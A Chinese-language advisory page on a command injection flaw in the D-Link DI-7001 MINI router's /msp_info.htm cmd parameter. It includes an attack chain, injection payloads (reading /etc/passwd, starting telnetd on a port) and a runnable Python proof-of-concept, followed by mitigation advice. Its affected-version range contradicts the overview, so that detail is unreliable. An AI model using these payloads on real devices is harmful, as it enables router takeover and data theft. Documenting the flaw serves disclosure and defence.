CVE-2025-12313 D-Link DI-7001 MINI路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-12313

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DI-7001 MINI

漏洞概述

CVE-2025-12313是D-Link DI-7001 MINI路由器中存在的一个命令注入漏洞。该漏洞影响固件版本19.09.19A1和24.04.18B1，漏洞位于Web管理界面的/msp_info.htm文件中。攻击者可以通过构造恶意的cmd参数值，实现远程命令注入攻击。由于该漏洞可通过网络远程利用，且只需要低权限认证即可实施攻击，因此对暴露在互联网的路由器设备构成严重安全威胁。攻击者成功利用此漏洞可以获取设备的完全控制权，执行任意系统命令，窃取敏感信息，或将设备纳入僵尸网络进行进一步攻击。该漏洞已公开披露，相关信息已在多个漏洞数据库和安全平台上发布，建议受影响用户尽快采取防护措施。

技术细节

该命令注入漏洞存在于D-Link DI-7001 MINI路由器的Web管理接口中，具体位于/msp_info.htm页面处理cmd参数的逻辑。当用户提交包含特殊构造字符的cmd参数时，后端程序未能对输入进行充分的过滤和验证，直接将用户输入传递给系统命令执行函数。攻击者可以通过在cmd参数中注入分号、管道符等shell元字符，构造恶意命令并使其被服务器执行。例如，通过在参数中插入分号后跟其他系统命令，攻击者可以在服务器上执行任意代码。此漏洞的CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但需要低权限认证（PR:L）。由于路由器通常缺乏完善的安全更新机制，且很多设备直接暴露在公网，攻击者可以自动化扫描和利用此类漏洞。

攻击链分析

STEP 1

步骤1

扫描发现暴露在互联网的D-Link DI-7001 MINI路由器设备，通常通过Shodan等搜索引擎查找使用特定固件版本且开放Web管理端口的目标

STEP 2

步骤2

访问路由器的Web管理界面，定位到/msp_info.htm页面，使用低权限账号登录（默认凭证或已泄露凭证）

STEP 3

步骤3

在cmd参数中注入恶意命令载荷，使用分号、管道符等shell元字符构造命令链，如';cat /etc/passwd'或';telnetd -p 8888'

STEP 4

步骤4

发送构造好的HTTP请求，服务器端程序未对参数进行安全过滤直接将用户输入拼接到系统命令中执行

STEP 5

步骤5

成功执行注入命令后，攻击者可以读取敏感配置文件、执行任意系统命令、建立后门连接或完全控制路由器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12313 PoC for D-Link DI-7001 MINI Command Injection
# Target: /msp_info.htm

def exploit(target_ip, port=80):
    """
    Exploit command injection in D-Link DI-7001 MINI
    Affected versions: 19.09.19A1, 24.04.18B1
    """
    url = f"http://{target_ip}:{port}/msp_info.htm"
    
    # Payload: inject command to create reverse shell or read system info
    # Using ';' to chain commands
    payload = {
        'cmd': ';cat /etc/passwd'  # Example: read passwd file
    }
    
    try:
        print(f"[*] Sending exploit to {url}")
        print(f"[*] Payload: {payload['cmd']}")
        
        response = requests.get(url, params=payload, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if 'root:' in response.text:
            print("[+] VULNERABLE! Command injection successful")
            print("[*] Extracted data:")
            # Parse and display relevant output
            return response.text
        else:
            print("[-] Target may not be vulnerable or command failed")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit(target, port)

影响范围

D-Link DI-7001 MINI 固件版本 < 19.09.19A1

D-Link DI-7001 MINI 固件版本 < 24.04.18B1

防御指南

临时缓解措施

立即将路由器Web管理界面从公网访问中移除，通过ACL或防火墙限制仅允许受信任的IP地址访问管理端口。如无法立即升级固件，建议使用VPN或端口转发等方式建立安全的管理通道，并密切监控设备状态和日志记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12313
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12313
3 Details https://www.cvedetails.com/cve/CVE-2025-12313/
4 VulDB https://vuldb.com/cve/CVE-2025-12313
5 Link https://github.com/DavCloudz/cve/issues/7
6 Link https://vuldb.com/?ctiid.329985
7 Link https://vuldb.com/?id.329985
8 Link https://vuldb.com/?submit.676887
9 Link https://www.dlink.com/